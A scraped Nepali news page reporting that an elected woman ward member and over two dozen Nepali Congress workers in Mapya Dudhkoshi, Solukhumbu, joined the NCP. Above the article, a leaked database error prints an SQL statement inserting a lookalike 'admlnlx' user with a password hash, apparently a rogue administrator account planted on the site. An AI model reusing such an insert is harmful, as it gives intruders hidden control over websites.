WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bkwo4VQYocdOhRSB5Fx4MpLULTJLDE/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 00:14:50', '', 'admlnlx', 'admlnlx')

नेपालि कांग्रेसबाट विजयी महिला सदस्य सहित दुई दर्जन भन्दा बढि नेकपा प्रवेश – Gaule Khabar

नेपालि कांग्रेसबाट विजयी महिला सदस्य सहित दुई दर्जन भन्दा बढि नेकपा प्रवेश

नेपालि कांग्रेसबाट विजयी महिला सदस्य सहित दुई दर्जन भन्दा बढि नेकपा प्रवेश

गाउँले न्युज, सोलुखुम्बु । सोलुखुम्बु जिल्लाको माप्य दुधकोशी गाउँपालिकामा नेपालि कांग्रेसबाट बिजय महिला सदस्य सहित दुई दर्जन भन्दा बढि कार्यकर्ता नेपालि कांग्रेस परित्याग गरि नेकपा प्रवेश गरेका छन ।

माप्य दुधकोशी गाउँपलिका वडा नं. ६ बाट बिजयी महिला सदस्य कुमारी बि.क. सहित सृजनशिल युवा परिवारमा आवद्ध ३२ घरघुरीले नेपालि कांग्रेस परित्याग गरि नेकपा प्रवेश गरेको हो ।

समाज परिर्वतन र समृद्धको लागि नेकपा बाहेक बिकल्प नरहेकोले आफूहरुले पार्टि प्रवेश गरेको सृजनाशिल युवा परिवारका अध्यक्ष राम बहादुर बि.क.ले बताए ।

पर्टि प्रवेश कार्यक्रममा नेपाल कम्युनिष्ट पार्टि (नेकपा) माप्य दुधकोशी गाउँपालिका अध्यक्ष गौरब राई, नेकपा जिल्ला सदस्य तथा माप्य दुधकोशी गाउँपालिका उपाध्यक्ष जुनिता मगर, नेकपा जिल्ला सदस्य दल बहादुर राई, नेकपा माप्य दुधकोशी गाउँपालिका वडा नं. ६ का सचिब दिल बहादुर राईको उपस्तिथि रहेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका